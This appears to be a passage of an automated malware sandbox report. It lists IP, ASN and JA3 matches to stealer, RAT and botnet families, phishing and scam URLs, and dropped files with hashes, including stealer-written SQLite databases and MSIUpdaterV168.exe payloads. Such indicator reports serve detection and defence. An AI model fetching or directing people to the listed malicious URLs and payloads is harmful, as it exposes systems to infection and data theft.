	SecuriteInfo.com.Trojan.Packed2.47113.10794.31741.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.12395.16994.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.2909.11487.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.15675.13139.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
db-ip.com	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	104.26.5.15
	External24.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	BRWgvKaqbg.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	104.26.4.15
	rise2406.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	http://luxury-sherbet-tk1111-10e1b5.netlify.app/form.html	Get hash	malicious	Unknown	Browse	172.67.75.166
	https://le-2vr.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	104.26.5.15
	https://e23-c5p.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	104.26.5.15
	https://ml5-94x.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	104.26.5.15
	https://cn10.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	172.67.75.166

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://yagyatech.com/netpaymem	Get hash	malicious	Unknown	Browse	172.64.155.119
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	fPqdDUeLwj.elf	Get hash	malicious	Mirai, Moobot	Browse	1.4.38.60
	AGREEMENT AND APPROVAL REPORT AERODYNE- RN & FR OF 2024-50254_6.5.24.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.159.201
	92s4OjHVFf.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	scan19062024.exe	Get hash	malicious	FormBook	Browse	172.67.205.232
	Leadership Development.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	Electronic Slip_ball.com.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	6Z4Q4bREii.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	https://www.teamviewer.com/en-in/download/windows/	Get hash	malicious	Unknown	Browse	104.19.178.52
PLUSTELECOM-ASRU	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	77.105.132.27
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	77.105.133.27
	HXUYIDwIMY.exe	Get hash	malicious	Meduza Stealer	Browse	77.105.147.172
	lhZOo8vhuI.elf	Get hash	malicious	Unknown	Browse	77.105.138.202
	file.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	77.105.147.130
	yqeO67O9gY.elf	Get hash	malicious	Mirai	Browse	77.105.140.109
	676767.exe	Get hash	malicious	Remcos	Browse	77.105.132.92
	setup.exe	Get hash	malicious	PureLog Stealer, RHADAMANTHYS	Browse	77.105.147.130
	3.exe	Get hash	malicious	LummaC, Remcos	Browse	77.105.132.92
	2.exe	Get hash	malicious	AsyncRAT, Remcos	Browse	77.105.132.92
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	D5u70TJkrE.exe	Get hash	malicious	DCRat	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	factura546532.msi_factura546532.msi_78870.msi	Get hash	malicious	Unknown	Browse	34.117.186.192
	Evo Resou_nls..scr.exe	Get hash	malicious	AsyncRAT	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.10794.31741.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.12395.16994.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.10794.31741.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.12395.16994.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.2909.11487.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
HETZNER-ASDE	56bDgH9sMQ.exe	Get hash	malicious	Vidar	Browse	195.201.251.214
	NI0Y4iB1ON.exe	Get hash	malicious	RedLine	Browse	5.161.190.139
	https://www.teamviewer.com/en-in/download/windows/	Get hash	malicious	Unknown	Browse	144.76.236.241
	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	195.201.57.90
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	195.201.57.90
	https://u.to/NuS5IA	Get hash	malicious	Unknown	Browse	94.130.141.49
	botx.x86.elf	Get hash	malicious	Mirai	Browse	135.181.82.247
	vjYcExA6ou.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	195.201.251.214
	_$phantom-SCV.cmd	Get hash	malicious	Unknown	Browse	144.76.71.93
	Evo Resou_nls..scr.exe	Get hash	malicious	AsyncRAT	Browse	49.12.202.237

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	92s4OjHVFf.exe	Get hash	malicious	LummaC	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	SecuriteInfo.com.Win32.Malware-gen.371.3693.exe	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	SecuriteInfo.com.Win32.Malware-gen.371.3693.exe	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	Plata.docx.doc	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	163.exe	Get hash	malicious	Unknown	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	https://sites.google.com/view/zinkfoodservicegroupinc/home	Get hash	malicious	HTMLPhisher	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	PO-MISA-32493.cmd	Get hash	malicious	Remcos, DBatLoader	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	External24.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192 104.26.4.15 188.114.97.3
	test.exe	Get hash	malicious	LummaC	Browse	34.117.186.192 104.26.4.15 188.114.97.3
37f463bf4616ecd445d4a1937da06e19	56bDgH9sMQ.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	vjYcExA6ou.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	factura546532.msi_factura546532.msi_78870.msi	Get hash	malicious	Unknown	Browse	149.154.167.99
	FIX_0x80070643_(Need_reboot).reg	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Packed2.47113.10794.31741.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Packed2.47113.12395.16994.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Packed2.47113.10794.31741.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Packed2.47113.12395.16994.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Adware.Downware.20552.29919.24444.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.Packed2.47113.2909.11487.dll	Get hash	malicious	Unknown	Browse	149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\KFCGDBAKKKFB\AAFHII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCGDBAKKKFB\AFCFHD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	modified
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCGDBAKKKFB\BAFCGI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCGDBAKKKFB\CAAEBK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCGDBAKKKFB\DBKKKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCGDBAKKKFB\DGHIEC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCGDBAKKKFB\IJEHID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1854464
Entropy (8bit):	7.954001690712007
Encrypted:	false
SSDEEP:	49152:Ktx9fJc02euDyRs7NNvZpFW3wrqirfHWZjlavwpX:Ktx9fe02beG5Nv+w+irHWZjlavwpX
MD5:	97768AB0A4837757B74DE2AE892BADAB
SHA1:	D8BDFDB717B64EE4CD7A892BBDDD293F7EAF915C
SHA-256:	0F88EA51A56DA966D12311A4B20EA3A6C44315E00747A589F19CF535F90CED77
SHA-512:	78BC5C866B12FCC82CDDA20622694824B227A4D522632FFCA4B6608BB5245A5E39C28E7F10DFD9E253407A922DAE47A83171FB3F605597AF4F7186C3AAF5DCDE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L...q..f...............'.@..........Rt.......P....@..........................p............@.............................P.......<............................P......h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...4I.......:..................@....reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	7.661614937929796
Encrypted:	false
SSDEEP:	12288:YwFARGxNB+mIuUOI+J0X6KALNGK34y1sB2Y+Jg4c:Yj4xb+mrZj1VHSB2Y6d
MD5:	0309DD0131150796EA99B30A62194FAE
SHA1:	2DF6E334708EAE810A74B844FD57E18E9FDC34CD
SHA-256:	07C09BA5A84F619E5B83A54298FFC58D20B00F14399C7A94B7F02B70EFC60F35
SHA-512:	3D4E5A0718D04FEE92D8040880B631107D1E23A6B3BCE430D58769179AF999C28B99E50C5CD45F283339F7BBB24FFACBF601A5447EDB12E28DA4517FBFA282E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L......f...............'.@..........Rt.......P....@..........................0............@.............................P.......<...................................h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.164843423829662
Encrypted:	false
SSDEEP:	6144:PW1SR6pmLZAuSWjVBojHmrXLXxhABtHqS2/Y++Rh5qrU/PD:PW1SRKGZIYViTGXLgHqX/k0rUn
MD5:	2FCB3543D06F526E93C7276356F557B7
SHA1:	3A646514C23CD1D38E83531B9399E2360EC62578
SHA-256:	7E359CC02DE7A6050C8B81EB16278E5356BE6CA904950E820F4AFADB8BB9EA2A
SHA-512:	FFA19E94CAEB66692CF30F4DCC036369DAA4D0B5377F4E3A7330C62DD8E10C1E0C388A68D8E6EAFB31E57F70312884123433AF9D8A0DFD601F9286A073795604
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.....$.......I... ...`....@.. ....................................@..................................H..K....`... ........................................................................... ............... ..H............text...4)... ..................... ..`.rsrc.... ...`..."...,..............@..@.reloc...............N..............@..B.................I......H........Y..`x......0...<....)..............................................(......0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~....(.....%..G~....(.....%..H~....(.....%..e~....(.....~....(.......o......8......(......s.......s>.......~....}....~...........s....(....o....}......{.....I~....(....o........9......I~....(.......8C........~....(....o....:......{....~....(....8......{....~....(.........(...........9........o........(

C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	430592
Entropy (8bit):	7.502731457989579
Encrypted:	false
SSDEEP:	12288:Zh0vCnLVT7zishmwaOF9dJl3AnhpzTly:Z8kLVPzMO9dnQnhZT
MD5:	F88272EA7674D3ACEDD8ADCF7643C598
SHA1:	0066FD44E2CD9293AF414F735BD80456F4E3EB1D
SHA-256:	FAD264ACC346BE1E63CD47611CD305CB9C894A13843119E22E87744808295387
SHA-512:	3D3435572767B85307271519A5A51668E284CC9AA0D09BF024AAFF31A4B4329BB189C627CEDA90BA00F02445F0D34F4DE642B30B054ECF9D1AC88BABEB113963
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._.....N...........I...q.M...q.J.....X.._......q.....r.^...r.^...r.^..Rich_..................PE..L...V.~f...............'.j...6......g.............@.......................................@..........................)..P...@*..P...............................4...X...................................@...............d............................text...7X.......Z.................. ..`.BsS....M....p.......^.............. ..`.rdata..f............n..............@..@.data....`...@...P..."..............@....reloc..4........ ...r..............@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3f61nAONpe1PsLC0_f82d3a92a5222e402e262757509296e8da22cb_d0580af8_479195b4-351e-49b2-a3ea-316895da9a37\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7431202568360963
Encrypted:	false
SSDEEP:	96:rKFtnQHaAsFhq2odvyDqPQXIDcQjGc64cEZcw3HJN+HbHg/8BRTf3Oy1H3a9/ZA9:m3nQH1LZ80tG8zTgjuGzuiF0Z24IO8o
MD5:	8DC243616B1714FD78001C5D40FE5431
SHA1:	95105E34E76DDFDF163FF2A4FC64C301650E3241
SHA-256:	C197A1E3AE7510A9C13415A7EE7FEE4DC4B3392F164EA5C195A9A12D74120271
SHA-512:	E6E02A967A467D3AE92A75000E15E83B9105FF5D47D90058717AD28B861596406E96500CA0451B44A93AEE2A671EE7501EE44D9A8E9DFD5F7AC25DCCC1C7CAFB
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.1.7.7.9.5.8.2.7.5.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.1.7.8.0.3.7.9.6.4.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.9.1.9.5.b.4.-.3.5.1.e.-.4.9.b.2.-.a.3.e.a.-.3.1.6.8.9.5.d.a.9.a.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.7.f.f.b.1.2.-.c.9.6.0.-.4.b.6.1.-.a.3.5.f.-.5.b.5.0.9.d.b.8.0.5.4.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.f.6.1.n.A.O.N.p.e.1.P.s.L.C.0.o.J.H.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.0.-.0.0.0.1.-.0.0.1.4.-.3.5.8.1.-.4.0.9.1.8.6.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.a.2.6.b.a.4.3.0.5.9.b.0.4.1.a.c.0.2.a.8.d.c.b.4.9.c.7.0.1.b.3.0.0.0.0.f.f.f.f.!.0.0.0.0.2.d.f.6.e.3.3.4.7.0.8.e.a.e.8.1.0.a.7.4.b.8.4.4.f.d.5.7.e.1.8.e.9.f.d.c.3.4.c.d.!.3.f.6.1.n.A.O.N.p.e.1.P.s.L.C.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_6p7a7injLZJojhET_a1161d118d5ba59481b8f8b70c2b917ff513e_5d3d4916_32023134-29b2-48b7-9726-c0b1a833f252\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7453866703984782
Encrypted:	false
SSDEEP:	96:MzFQLEUEbBwosW+hqNoiyDqPQXIDcQlc6WecETcw38PeIeY+HbHg/8BRTf3Oy1H0:m+2dwo5O07T5AMjuGzuiF0Z24IO84
MD5:	E71D12A7C8686CB117C7EBDD3852141B
SHA1:	3544FFD44F45DB892C664342A4FC1AD977E2C4EB
SHA-256:	6EE3FED7AAC4509885D8F3050DAF268ABDC48871D151AB22CA80824C090DCEBA
SHA-512:	1EEB728B18FD19B13C390F5283B3165105135389970BFEE3A4B3B5B1FD37C98253E7F986E9F0D724A6EFE646B7D873717A405E8088EF41159EEE3B7D71A3E7E4
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.1.7.7.6.6.8.7.1.5.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.1.7.7.7.0.4.6.5.3.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.0.2.3.1.3.4.-.2.9.b.2.-.4.8.b.7.-.9.7.2.6.-.c.0.b.1.a.8.3.3.f.2.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.4.5.6.d.4.7.-.a.c.1.f.-.4.7.3.c.-.8.b.1.5.-.5.a.1.9.f.3.8.6.f.9.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.p.7.a.7.i.n.j.L.Z.J.o.j.h.E.T.B.N.h.L...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.4.4.-.0.0.0.1.-.0.0.1.4.-.6.6.c.9.-.f.2.8.e.8.6.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.5.4.7.4.6.a.8.b.f.6.1.5.0.5.5.a.2.e.4.0.5.c.9.d.7.c.5.7.e.3.3.0.0.0.0.f.f.f.f.!.0.0.0.0.d.8.b.d.f.d.b.7.1.7.b.6.4.e.e.4.c.d.7.a.8.9.2.b.b.d.d.d.2.9.3.f.7.e.a.f.9.1.5.c.!.6.p.7.a.7.i.n.j.L.Z.J.o.j.h.E.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8x9h3ctqkpfTu0sN_bcd59447a98a76fb8c7cd5a1a3d8f6a156d5590_e32e0909_979e31ca-154c-4d57-aaab-bd7a35d85d31\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7399515456186062
Encrypted:	false
SSDEEP:	192:IT2/6jYkRN0BU/rSTjGGzuiF0Z24IO8wV9Y:OYQOBU/YjHzuiF0Y4IO8AY
MD5:	64EC4EDC031AA684FF3D1DBAD42E078A
SHA1:	C2BB17D3DDCBA249367F88C8DE95FFE05317EA9B
